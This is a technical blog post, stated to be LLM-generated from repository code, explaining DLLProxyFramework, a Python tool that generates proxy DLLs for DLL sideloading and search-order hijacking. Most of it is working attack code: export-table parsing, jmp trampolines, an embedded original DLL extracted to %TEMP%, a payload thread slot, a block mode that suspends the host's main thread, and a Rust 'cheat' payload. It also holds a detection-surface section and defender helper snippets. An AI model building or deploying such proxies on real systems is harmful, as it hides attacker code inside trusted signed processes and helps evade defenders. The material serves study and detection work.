DLL Proxy Loading: Hijacking Legitimate DLLs for Code Execution
This post covers DLLProxyFramework, a Python tool that takes a target DLL, analyzes its PE export table, and generates a complete Visual Studio or MinGW project that compiles into a proxy DLL. The proxy mirrors every export of the original, forwarding calls through assembly trampolines while executing an arbitrary payload in a separate thread. The technique is known as DLL sideloading (or DLL proxying) and is commonly used for persistence, defense evasion, and game hacking.
What DLL Sideloading Achieves
When a Windows process loads a DLL, the loader searches a well-defined sequence of directories [1]. If an attacker can place a DLL with the right name earlier in that search order, the process loads the attacker’s DLL instead of the legitimate one. This is DLL search order hijacking [2].
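From a defender's point of view, the condition described above can be checked mechanically. The sketch below is illustrative and not part of DLLProxyFramework: the function name `find_shadowing_dlls` and both directory parameters are hypothetical. It compares file names only, so it flags candidates for review rather than proving a hijack.

```python
from pathlib import Path


def find_shadowing_dlls(app_dir, system_dir):
    """Return names of DLLs in app_dir that also exist in system_dir.

    A match means the application-directory copy would be found first
    by loads that search the application directory before the system
    directory. Names are compared case-insensitively, as on Windows.
    """
    system_names = {
        p.name.lower()
        for p in Path(system_dir).iterdir()
        if p.is_file() and p.suffix.lower() == ".dll"
    }
    return sorted(
        p.name
        for p in Path(app_dir).iterdir()
        if p.is_file()
        and p.suffix.lower() == ".dll"
        and p.name.lower() in system_names
    )
```

On a Windows host this might be called as `find_shadowing_dlls(r"C:\SomeApp", r"C:\Windows\System32")`, where the application path is a placeholder. Many applications legitimately ship their own copies of common DLLs, so a hit is a starting point for checking signatures, not a verdict.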
The problem with a naive replacement is that the host process expects the DLL to export specific functions. If those exports are missing, the process crashes or fails to start. A proxy DLL solves this by forwarding every export to the real DLL while also running attacker code. The host process calls GetFileVersionInfoA, the proxy’s trampoline jumps to the real GetFileVersionInfoA in the original DLL, and the call completes normally. Meanwhile, a payload thread runs in the background.
From the perspective of a defender reviewing process logs, the running executable is a legitimate, signed binary. The proxy DLL is just a library it was going to load anyway. This is what makes sideloading attractive for both red team operations and game cheating: the payload executes inside a trusted process. For a different approach to getting code into a target process (kernel APC injection from ring 0), see the Peregrine kernel APC injection post.
The Four-Stage Pipeline
The framework is structured as four modules that run sequentially: PE analysis, code generation, resource embedding, and build output. The entry point in generate.py orchestrates them:
# From: generate.py
from analyzer import PEAnalyzer
from generator import CodeGenerator
from embedder import ResourceEmbedder
# ...
analyzer = PEAnalyzer()
export_table = analyzer.analyze(dll_path)
generator = CodeGenerator()
files = generator.generate(
    export_table,
    embed_enabled=args.embed,
    payload_enabled=args.payload,
    block_enabled=args.block,
    compiler=args.compiler,
    original_dll_filename=original_dll_filename,
    original_dll_path=original_dll_path,
)
A single command produces all the files needed for compilation:
python generate.py C:\Windows\System32\version.dll --payload --embed --block
The output is a self-contained project directory with C source, assembly trampolines, a module definition file, build scripts, and optionally the original DLL embedded as a PE resource.
Parsing the PE Export Table with pefile
The PEAnalyzer class uses the pefile library to extract the export directory from the target DLL. Each export becomes an ExportEntry dataclass that captures the ordinal, name (if any), forwarding target (if any), and a sanitized identifier safe for use in C and assembly source:
# From: analyzer/pe_analyzer.py
@dataclass
class ExportEntry:
    ordinal: int
    name: str | None
    safe_name: str
    forwarder: str | None = None
    forwarder_dll: str | None = None
    forwarder_func: str | None = None

    @property
    def is_named(self) -> bool:
        return self.name is not None

    @property
    def is_forwarded(self) -> bool:
        return self.forwarder is not None

    @property
    def is_ordinal_only(self) -> bool:
        return self.name is None
The analyzer handles four categories of exports that appear in real Windows DLLs:
- Named exports: The common case. The export has a string name like GetFileVersionInfoA.
- Ordinal-only exports: No name, just a number. Resolved via GetProcAddress(hModule, MAKEINTRESOURCE(ordinal)) [3].
- Forwarded exports: The PE export table points to another DLL rather than containing code. For example, kernel32.dll forwards many exports to ntdll.dll [4].
- C++ mangled names: Exports like ?Initialize@CFactory@@QEAAJXZ contain characters that are illegal in C identifiers.
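The four categories can be told apart from just the name and forwarder fields of an export. The following is a minimal sketch, not the framework's code: `classify_export` and `split_forwarder` are hypothetical helpers, the leading `?` test is a heuristic for MSVC-style mangling, and splitting the forwarder string on its last dot is an assumption of this example.

```python
def split_forwarder(forwarder):
    """Split a forwarder string such as 'NTDLL.RtlAllocateHeap'.

    Returns (dll, function), or (None, None) if there is nothing to split.
    Splitting on the LAST dot is an assumption of this sketch.
    """
    if not forwarder or "." not in forwarder:
        return None, None
    dll, _, func = forwarder.rpartition(".")
    return dll, func


def classify_export(name, forwarder=None):
    """Return one of: 'forwarded', 'ordinal-only', 'mangled', 'named'."""
    if forwarder is not None:
        return "forwarded"
    if name is None:
        return "ordinal-only"
    if name.startswith("?"):  # heuristic: MSVC-decorated C++ names begin with '?'
        return "mangled"
    return "named"
```

An entry can be both forwarded and named, so the order of the checks matters: the forwarder test comes first because a forwarded export has no code of its own to jump to.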
The name sanitization handles all of these by replacing special characters with safe alternatives:
# From: analyzer/pe_analyzer.py
_REPLACEMENTS = {
    '?': '_Q', '@': '_A', '$': '_D', '<': '_L', '>': '_G',
    ',': '_C', ' ': '_S', '-': '_H', ':': '_K', '~': '_T',
    '(': '_OP', ')': '_CP', '[': '_OB', ']': '_CB',
    '{': '_OC', '}': '_CC', '=': '_EQ', '+': '_P',
    '&': '_R', '*': '_X', '!': '_N', '#': '_SH',
}

def sanitize_identifier(name: str) -> str:
    result = name
    for old, new in _REPLACEMENTS.items():
        result = result.replace(old, new)
    result = re.sub(r'[^a-zA-Z0-9_]', '_', result)
    if result and result[0].isdigit():
        result = '_' + result
    return result
This produces identifiers like _QInitialize_ACFactory_A_AQEAAJXZ for the mangled C++ name above. Ugly, but guaranteed to be valid in both C source and assembly labels.
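The mapping is easy to check by hand or by running the function. The snippet below reproduces the sanitizer as quoted above so that it is self-contained, then exercises it on the mangled name and on two edge cases. The edge-case inputs are made up for illustration. One thing the check shows is that validity does not imply uniqueness: two different export names can sanitize to the same identifier.

```python
import re

_REPLACEMENTS = {
    '?': '_Q', '@': '_A', '$': '_D', '<': '_L', '>': '_G',
    ',': '_C', ' ': '_S', '-': '_H', ':': '_K', '~': '_T',
    '(': '_OP', ')': '_CP', '[': '_OB', ']': '_CB',
    '{': '_OC', '}': '_CC', '=': '_EQ', '+': '_P',
    '&': '_R', '*': '_X', '!': '_N', '#': '_SH',
}


def sanitize_identifier(name):
    """Replace characters that are illegal in C identifiers."""
    result = name
    for old, new in _REPLACEMENTS.items():
        result = result.replace(old, new)
    # Anything not covered by the table falls back to a plain underscore.
    result = re.sub(r'[^a-zA-Z0-9_]', '_', result)
    # C identifiers cannot start with a digit.
    if result and result[0].isdigit():
        result = '_' + result
    return result


mangled = sanitize_identifier("?Initialize@CFactory@@QEAAJXZ")
leading_digit = sanitize_identifier("1stExport")
# Two distinct inputs that collapse to the same identifier.
collision = sanitize_identifier("a?b") == sanitize_identifier("a_Qb")
```

Here `mangled` is `_QInitialize_ACFactory_A_AQEAAJXZ`, `leading_digit` is `_1stExport`, and `collision` is `True`. Whether such collisions ever occur in a real export table is a separate question; a generator that wanted to be safe could append the ordinal to each label.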
The .def file uses a quoting mechanism for the original names so the linker maps them correctly even when they contain special characters:
# From: generator/template_engine.py
@staticmethod
def _quote_def(name: str) -> str:
    if any(c in name for c in '?@$ <>{}()!#~+-=&*,'):
        return f'"{name}"'
    return name
Assembly Trampolines: One jmp Per Export
The core of the proxy mechanism is the trampoline. For each export, the generator produces an assembly procedure that does exactly one thing: jump through a function pointer. The function pointer is initialized at load time to point to the corresponding function in the real DLL.
For x64 MASM (Visual Studio’s assembler):
; From: generator/templates/trampoline_msvc_x64.asm.j2
.data
EXTERN fp_GetFileVersionInfoA:QWORD
.code
proxy_GetFileVersionInfoA PROC
jmp QWORD PTR [fp_GetFileVersionInfoA]
proxy_GetFileVersionInfoA ENDP
For x86, the pattern is the same, with 32-bit pointers and the leading underscore that C name decoration (cdecl) adds to symbols on 32-bit Windows:
; From: generator/templates/trampoline_msvc_x86.asm.j2
.model flat
.data
EXTERN _fp_GetFileVersionInfoA:DWORD
.code
_proxy_GetFileVersionInfoA PROC
jmp DWORD PTR [_fp_GetFileVersionInfoA]
_proxy_GetFileVersionInfoA ENDP
The GCC/MinGW variant uses GAS syntax with Intel mode:
/* From: generator/templates/trampoline_gcc_x64.S.j2 */
.intel_syntax noprefix
.text
.global proxy_GetFileVersionInfoA
proxy_GetFileVersionInfoA:
jmp QWORD PTR [rip + fp_GetFileVersionInfoA]
The jmp through a memory operand is critical. Unlike call, it does not push a return address, so the stack is untouched, and it does not clobber any registers. The caller’s arguments, return address, and register state pass through unchanged, and the real function returns directly to the original caller. From the caller’s perspective, the trampoline is invisible. Import thunks use the same mechanism when they jump through import address table (IAT) entries [5]. For a deeper look at how hooking frameworks intercept exactly these kinds of jumps, see the MinHook API interception post.
The .def file (module definition) maps the original export names back to the trampoline labels:
; From: generator/templates/exports.def.j2
LIBRARY "version"
EXPORTS
GetFileVersionInfoA = proxy_GetFileVersionInfoA @1
GetFileVersionInfoSizeA = proxy_GetFileVersionInfoSizeA @3
For ordinal-only exports, the NONAME keyword tells the linker to export by ordinal without a name string:
proxy_ordinal_42 @42 NONAME
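The two .def line shapes shown above can be produced by a few lines of Python. This is a sketch of the idea rather than the framework's template: `def_line` is a hypothetical helper, `quote_def` mirrors the quoting rule quoted earlier, and the exact spacing the real template emits may differ.

```python
DEF_SPECIAL = set('?@$ <>{}()!#~+-=&*,')


def quote_def(name):
    """Wrap the export name in quotes if it contains special characters."""
    return f'"{name}"' if any(c in DEF_SPECIAL for c in name) else name


def def_line(ordinal, name=None, safe_name=None):
    """Render one EXPORTS entry for a named or an ordinal-only export."""
    if name is None:
        # Ordinal-only: export the trampoline by number, without a name string.
        return f"proxy_ordinal_{ordinal} @{ordinal} NONAME"
    # Named: original name on the left, trampoline label on the right.
    return f"{quote_def(name)} = proxy_{safe_name} @{ordinal}"


lines = [
    def_line(1, "GetFileVersionInfoA", "GetFileVersionInfoA"),
    def_line(7, "?Initialize@CFactory@@QEAAJXZ", "_QInitialize_ACFactory_A_AQEAAJXZ"),
    def_line(42),
]
```

The ordinal 7 for the mangled name is invented for the example. Keeping the original ordinal on every line matters because some callers import by ordinal rather than by name.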
Resolving Function Pointers at DLL_PROCESS_ATTACH
When the host process loads the proxy DLL, DllMain receives DLL_PROCESS_ATTACH. The proxy loads the original DLL (either from an embedded resource or from disk) and resolves every function pointer:
// From: generator/templates/proxy.c.j2
/* --- Function pointer table --- */
FARPROC fp_GetFileVersionInfoA = NULL;
FARPROC fp_GetFileVersionInfoSizeA = NULL;
// ... one per export
/* --- Resolve all exports from the original DLL --- */
void resolve_exports(HMODULE hOriginal) {
fp_GetFileVersionInfoA = GetProcAddress(hOriginal, "GetFileVersionInfoA");
fp_GetFileVersionInfoSizeA = GetProcAddress(hOriginal, "GetFileVersionInfoSizeA");
// ...
}
For ordinal-only exports, resolution uses the ordinal number directly:
// From: generator/templates/proxy.c.j2
fp_ordinal_42 = GetProcAddress(hOriginal, (LPCSTR)MAKEINTRESOURCE(42));
GetProcAddress is the standard Windows API for resolving exported functions by name or ordinal [3]. Every function pointer starts as NULL and is populated before any trampoline can be called. Since DllMain with DLL_PROCESS_ATTACH runs while the loader lock is held [6], no other thread in the process can call any of these exports until initialization completes.
Embedding the Original DLL as a PE Resource
In non-embed mode, the original DLL must be placed alongside the proxy under a different filename (e.g., original_version.dll), which means deploying two files. The --embed flag eliminates that requirement by baking the original DLL into the proxy as a binary PE resource.
The resource definition is straightforward:
// From: generator/templates/resource.rc.j2
#include "resource.h"
IDR_ORIGINAL_DLL BINARY "original_version.dll"
// From: generator/templates/resource.h.j2
#define IDR_ORIGINAL_DLL 101
At load time, the proxy extracts the resource to a temporary directory and loads it:
// From: generator/templates/proxy.c.j2
static BOOL load_embedded_dll(void) {
HRSRC hRes = FindResourceA(hSelf, MAKEINTRESOURCEA(IDR_ORIGINAL_DLL), "BINARY");
if (!hRes) return FALSE;
HGLOBAL hGlobal = LoadResource(hSelf, hRes);
if (!hGlobal) return FALSE;
LPVOID pData = LockResource(hGlobal);
DWORD dwSize = SizeofResource(hSelf, hRes);
if (!pData || dwSize == 0) return FALSE;
char szTempDir[MAX_PATH];
GetTempPathA(MAX_PATH, szTempDir);
lstrcatA(szTempDir, "proxy_fw\\");
CreateDirectoryA(szTempDir, NULL);
lstrcpyA(szTempPath, szTempDir);
lstrcatA(szTempPath, "original_version.dll");
HANDLE hFile = CreateFileA(szTempPath, GENERIC_WRITE, 0, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) return FALSE;
DWORD dwWritten;
WriteFile(hFile, pData, dwSize, &dwWritten, NULL);
CloseHandle(hFile);
if (dwWritten != dwSize) return FALSE;
hOriginalDll = LoadLibraryA(szTempPath);
return hOriginalDll != NULL;
}
The FindResource / LoadResource / LockResource sequence is the standard Windows API pattern for reading embedded resources [7]. The extracted DLL goes to %TEMP%\proxy_fw\ and is cleaned up in the DLL_PROCESS_DETACH handler. This reduces the deployment to a single file: just the proxy DLL, placed next to the target executable.
Block Mode: Keeping the Process Alive
Some host processes exit immediately after loading their DLLs. A command-line tool that prints --help and exits, for instance, will terminate before a payload thread can finish its work. The --block flag addresses this with a two-layer approach.
Primary path: The payload wrapper thread suspends the main thread before it can reach ExitProcess. Once the payload completes, it calls ExitProcess(0) itself:
// From: generator/templates/proxy.c.j2
static DWORD WINAPI payload_wrapper(LPVOID lpParam) {
if (hMainThread) {
SuspendThread(hMainThread);
}
payload_main(lpParam);
SetEvent(hPayloadDone);
ExitProcess(0);
return 0;
}
Fallback path: If the main thread wins the race and begins exit processing before the wrapper can suspend it, a registered atexit handler blocks until the payload signals completion:
// From: generator/templates/proxy.c.j2
static void wait_for_payload(void) {
if (hPayloadDone) {
WaitForSingleObject(hPayloadDone, INFINITE);
}
}
The atexit handler is registered during DLL_PROCESS_ATTACH:
// From: generator/templates/proxy.c.j2
case DLL_PROCESS_ATTACH:
hSelf = hinstDLL;
DisableThreadLibraryCalls(hinstDLL);
init_proxy();
atexit(wait_for_payload);
break;
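The main thread handle is obtained inside the process by calling DuplicateHandle with THREAD_SUSPEND_RESUME access rather than by opening the thread from outside, so no cross-process handle operations are involved. The design aims to avoid loader-lock deadlocks on both paths: the wrapper runs in its own thread, which is created during DLL_PROCESS_ATTACH but does not start executing until the loader lock is released, so the suspend happens after that point, and the atexit handler waits only on an event, not on a lock. One general SuspendThread caveat still applies: if the main thread is suspended while it holds a lock the payload later needs (a heap lock, for example), the payload can stall.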
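The event handshake at the heart of the fallback path is a generic synchronization pattern. As a language-neutral illustration, here is a minimal Python analogue. It is not a translation of the C template: all names are hypothetical, `threading.Event` stands in for the Win32 event object, and the wait uses a finite timeout instead of INFINITE so the example cannot hang.

```python
import threading

payload_done = threading.Event()  # stands in for hPayloadDone
results = []


def payload_main():
    """Placeholder for the work that must finish before exit."""
    results.append("payload finished")


def payload_wrapper():
    """Run the payload, then signal completion even if it raises."""
    try:
        payload_main()
    finally:
        payload_done.set()


def run_and_wait(timeout=5.0):
    """Start the worker and block until it signals or the timeout expires."""
    worker = threading.Thread(target=payload_wrapper, daemon=True)
    worker.start()
    return payload_done.wait(timeout)
```

Setting the event in a `finally` block is a choice made for this sketch: a waiter that depends on a signal should get it on every exit path of the worker, otherwise a failing payload turns into a hung process.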
The Payload Slot
When --payload is specified, the generator produces a payload.c template:
// From: generator/templates/payload.c.j2
DWORD WINAPI payload_main(LPVOID lpParam) {
(void)lpParam;
/* --- YOUR CODE HERE --- */
OutputDebugStringA("[DLL Proxy] Payload thread started\n");
OutputDebugStringA("[DLL Proxy] Payload thread finished\n");
return 0;
}
This function runs in a separate thread after all exports are resolved and forwarding is active. The host process continues to function normally while the payload executes. The payload can do anything: load a DLL reflectively, connect to a C2 server, hook game functions, or call out to statically linked code.
Statically Linking a Rust Payload
The repository includes an example of linking a Rust static library into the proxy. The Rust crate is configured as a staticlib:
# From: test/rust_cheat/Cargo.toml
[package]
name = "rust_cheat"
version = "0.1.0"
edition = "2024"
[lib]
crate-type = ["staticlib"]
The entry point uses C linkage:
// From: test/rust_cheat/src/lib.rs
use std::fs;
use std::io::Write;
#[unsafe(no_mangle)]
pub extern "C" fn cheat_main() {
let pid = std::process::id();
let msg = format!(
"Rust cheat running!\nPID: {}\nThis code is executing inside the hijacked process.\n",
pid
);
if let Ok(mut f) = fs::File::create("rust_proof.txt") {
let _ = f.write_all(msg.as_bytes());
}
}
The payload.c file calls the Rust function via an extern declaration, and the Rust .lib is added to the linker command. The result is a single DLL file containing the proxy export table, the embedded original DLL, and the entire Rust payload, all statically linked. No additional files need to be dropped to disk.
Jinja2 Template Engine and Code Generation
All generated source files come from Jinja2 templates in generator/templates/. The TemplateEngine class loads them and provides two custom filters: sanitize (for identifier sanitization) and quote_def (for .def file quoting):
# From: generator/template_engine.py
class TemplateEngine:
    def __init__(self):
        self.env = Environment(
            loader=FileSystemLoader(str(TEMPLATES_DIR)),
            trim_blocks=True,
            lstrip_blocks=True,
            keep_trailing_newline=True,
        )
        self.env.filters['sanitize'] = sanitize_identifier
        self.env.filters['quote_def'] = self._quote_def
The CodeGenerator class decides which templates to render based on the flags:
# From: generator/codegen.py
files['proxy.c'] = self.engine.render('proxy.c.j2', ctx)
files['proxy.h'] = self.engine.render('proxy.h.j2', ctx)
files['exports.def'] = self.engine.render('exports.def.j2', ctx)
if compiler in ('msvc', 'both'):
    if export_table.is_64bit:
        files['trampolines.asm'] = self.engine.render('trampoline_msvc_x64.asm.j2', ctx)
    else:
        files['trampolines.asm'] = self.engine.render('trampoline_msvc_x86.asm.j2', ctx)
    files['build_msvc.bat'] = self.engine.render('build_msvc.bat.j2', ctx)
if compiler in ('gcc', 'both'):
    if export_table.is_64bit:
        files['trampolines.S'] = self.engine.render('trampoline_gcc_x64.S.j2', ctx)
    else:
        files['trampolines.S'] = self.engine.render('trampoline_gcc_x86.S.j2', ctx)
    files['Makefile'] = self.engine.render('Makefile.j2', ctx)
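The number of generated files depends on the options: always proxy.c, proxy.h, and exports.def; a trampoline file and a build file for each selected compiler; and optionally payload.c, payload.h, resource.rc, and resource.h. Counting only the files named here, that ranges from 5 (one compiler, no options) to 11 (both compilers with payload and embed enabled). The template approach means adding support for a new compiler or architecture requires only a new .j2 file and an if branch in the generator.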
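The selection logic can be summarized as a function from options to file names. The sketch below counts only the file names mentioned in this section. `expected_files` is a hypothetical helper, the mapping of payload and embed options to their files is inferred from the descriptions above, and the real generator may emit additional files that are not listed here.

```python
def expected_files(compiler, payload=False, embed=False):
    """List the output file names implied by the options.

    compiler is 'msvc', 'gcc', or 'both'. Architecture is not a
    parameter because it changes which template is rendered, not the
    name of the output file.
    """
    files = ["proxy.c", "proxy.h", "exports.def"]
    if compiler in ("msvc", "both"):
        files += ["trampolines.asm", "build_msvc.bat"]
    if compiler in ("gcc", "both"):
        files += ["trampolines.S", "Makefile"]
    if payload:
        files += ["payload.c", "payload.h"]
    if embed:
        files += ["resource.rc", "resource.h"]
    return files


smallest = len(expected_files("msvc"))
largest = len(expected_files("both", payload=True, embed=True))
```

With these assumptions `smallest` is 5 and `largest` is 11.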
Test Suite: Eight Combinations of Compiler and Mode
The test/ directory contains a batch script that exercises all mode combinations against version.dll for both MSVC and MinGW. Each test generates a proxy, builds it, and runs a test host that loads the proxy and calls GetFileVersionInfoSizeA:
// From: test/test_host.c
int main(void) {
printf("[host] Loading version.dll...\n");
HMODULE hVer = LoadLibraryA("version.dll");
if (!hVer) {
printf("[host] FAIL: LoadLibrary returned NULL (error %lu)\n", GetLastError());
return 1;
}
pfnGetFileVersionInfoSizeA pSize =
(pfnGetFileVersionInfoSizeA)GetProcAddress(hVer, "GetFileVersionInfoSizeA");
if (pSize) {
DWORD dwHandle = 0;
DWORD size = pSize("C:\\Windows\\System32\\kernel32.dll", &dwHandle);
printf("[host] GetFileVersionInfoSizeA(kernel32.dll) = %lu\n", size);
}
// ...
}
For block mode tests, the payload writes a proof.txt file. The test checks for its existence after the host exits:
// From: test/test_payload_block.c
DWORD WINAPI payload_main(LPVOID lpParam) {
(void)lpParam;
FILE *f = fopen("proof.txt", "w");
if (f) { fprintf(f, "ok"); fclose(f); }
return 0;
}
The test matrix covers 8 combinations: 4 mode permutations (embed/no-embed crossed with block/no-block) for each of the 2 compilers (MSVC and GCC). This verifies that export forwarding, resource extraction, and process blocking all work correctly across both toolchains.
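The matrix is a plain Cartesian product, which a few lines of Python can enumerate. This is an illustrative sketch, not the repository's batch script: the function name and the dictionary keys are made up for the example.

```python
from itertools import product


def build_test_matrix():
    """Enumerate every compiler and mode combination described above."""
    compilers = ("msvc", "gcc")
    return [
        {"compiler": compiler, "embed": embed, "block": block}
        for compiler, embed, block in product(compilers, (False, True), (False, True))
    ]


matrix = build_test_matrix()
```

`matrix` holds 2 × 2 × 2 = 8 entries. Generating the combinations instead of listing them by hand keeps the matrix complete if a third compiler or another mode flag is added later.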
Limitations and Detection Surface
Temp directory artifact. In embed mode, the original DLL is extracted to %TEMP%\proxy_fw\. Any file system monitor or EDR agent watching temp directories for DLL drops will flag this. The cleanup in DLL_PROCESS_DETACH deletes the file, but if the process crashes, the extracted DLL persists. The framework’s author comments: “I left this IOC in the framework intentionally to make life harder for script kiddies. Anyone with a bit of knowledge can change or remove it.”
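Because the directory name is fixed, a defender can look for the artifact directly. The following is a minimal sketch under that assumption. `find_extracted_dlls` is a hypothetical helper, and the default subdirectory name is taken from the path quoted above.

```python
import tempfile
from pathlib import Path


def find_extracted_dlls(temp_root=None, subdir="proxy_fw"):
    """Return DLL files found in <temp_root>/<subdir>, sorted by path.

    temp_root defaults to the current user's temp directory. An empty
    list means the directory is missing or contains no DLLs.
    """
    root = Path(temp_root or tempfile.gettempdir()) / subdir
    if not root.is_dir():
        return []
    return sorted(
        p for p in root.iterdir()
        if p.is_file() and p.suffix.lower() == ".dll"
    )
```

A hit only shows that something wrote a DLL to that location. The check is per user, since each account has its own temp directory.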
No signature on the proxy DLL. The host executable may be signed, but the proxy DLL is not. Defenders checking DLL signatures or Authenticode status will immediately see the discrepancy [8]. Some applications also verify the integrity of their own loaded modules.
Static function pointer table. All function pointers are global FARPROC variables initialized once at load time. This is correct and efficient, but a memory scanner looking for patterns of jmp QWORD PTR [rip + ...] in non-system DLLs could identify the proxy. The trampolines are structurally identical to IAT thunks, which provides some natural camouflage.
No loader lock awareness in the payload. The payload thread is created during DLL_PROCESS_ATTACH but does not execute until the loader lock is released, which is the behavior the framework documents for its wrapper-thread model. That covers the common case. The remaining risk is payload code that ends up running under the loader lock anyway, for example in the DllMain of a DLL the payload loads: calling LoadLibrary from there could deadlock [6].
ANSI-only paths. The temp path extraction and DLL loading use the *A (ANSI) variants of the Windows API. This can fail on systems where the temp path contains characters outside the active code page. Using the *W (wide) variants would be more robust.
This post was generated by an LLM based on code from DLLProxyFramework. All code snippets are from the actual repository.
References
[1] Microsoft, “Dynamic-Link Library Search Order”, learn.microsoft.com
[2] MITRE ATT&CK, “T1574.001: Hijack Execution Flow: DLL Search Order Hijacking”, attack.mitre.org
[3] Microsoft, “GetProcAddress function”, learn.microsoft.com
[4] Microsoft, “PE Format: Export Directory Table”, learn.microsoft.com
[5] Microsoft, “PE Format: Import Address Table”, learn.microsoft.com
[6] Microsoft, “DllMain entry point: Remarks”, learn.microsoft.com
[7] Microsoft, “FindResource function”, learn.microsoft.com
[8] Microsoft, “Authenticode”, learn.microsoft.com